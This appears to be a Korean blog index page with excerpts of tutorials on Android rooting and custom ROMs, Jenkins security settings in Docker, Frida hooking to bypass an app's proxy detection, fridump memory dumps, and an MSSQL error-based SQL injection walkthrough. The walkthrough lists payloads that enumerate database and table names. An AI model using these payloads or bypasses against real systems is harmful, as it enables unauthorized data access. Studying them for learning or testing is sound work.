[android] 커스텀롬, 루팅 1. Odin TWRP 넣기 전원+홈+볼륨 하 버튼 눌러 다운로드 모드 twrp 선택하고 Start (PASS 뜨면 완료) 2. TWRP로 폰 초기화 하기 전원+홈+볼륨 상 버튼 눌러 리커버리 모드 Swipe to Wipe 하여 초기화 3. 롬, 갭스 설치 TWRP 넣은 후, 탐색기에서 디바이스 루트경로에 롬-14.0.zip, 갭스-arm-7.0 zip 옮긴 후 설치 재부팅 후 5분정도 기다리면 폰 켜짐. 4. 폰 확인 5. 루팅은 SuperSU.zip TWRP로 넣어서 위와 같이 설치함 도커(Docker) 젠킨스(Jenkins) 보안 1. 메모리 문제 때문에 돌아가지 않아 /etc/default/grub 파일 수정 2. 도커로 젠킨스 이미지 실행~ (비번도 나옴) 3. 비번 입력하면 Welcome to Jenkins 뜸 4. 보안 관련 설정 아래에 잇음. https://jenkins.io/doc/book/managing/security/ Authorization 설정 기본 설치시 Anyone can do anything, Legacy mode, Logged-in user can do anything 세가지만 있음. 아래 플러그인 설치해야 Matrix-based security 쓸 수 있다. Matrix Authorization Strategy Plugin * 젠킨스 블로그 https://m.blog.naver.com/punxoi/22.. [android] frida hooking (프록시 탐지 우회) 1. proxy 탐지 구문 public static boolean ~~~Proxy(Context context) { int parseInt; if (VERSION.SDK_INT >= 14) { context = System.getProperty("http.proxyHost"); String property = System.getProperty("http.proxyPort"); if (property == null) { property = "-1"; } parseInt = Integer.parseInt(property); } else { String host = Proxy.getHost(context); parseInt = Proxy.getPort(context); context = host; } retu.. [android] frida 설치, fridump (메모리 덤프) 1. adb shell 2. PC에 frida 설치 (python 3.5) 3. frida-server 파일 다운로드 후, 폰(android)으로 옮김 https://github.com/frida/frida/releases (galaxy 4 lte는 arm 32bit) frida-server-10.7.7-android-arm.xz download 4. 프로세스 확인 5. fridump 설치 및 확인 (python 2.7) https://github.com/Nightbringer21/fridump 6. 패키지 이름으로 메모리 덤프 7. 덤프 파일 확인 [SQL Injection] mssql 버전 확인 hxxp://localhost/shop_board/shop_board_list.asp?page=1&v_num= 26 and @@version=1-- DB 확인 26 and (select db_name())=1-- id 번호에 해당하는 DB 이름 확인 26 and (select name from master..sysdatabases where dbid=2)=1-- 1 -> master 2 -> tempdb 3 -> model 12 -> oyesmall 테이블명 확인 (해당 DB 중 제외할 테이블명을 조건으로 입력) 26 and (select top 1 name from oyesmall.dbo.sysobjects where xtype='U' and name 'poll_tail')=1-- admin.. 이전 1 2 3 다음
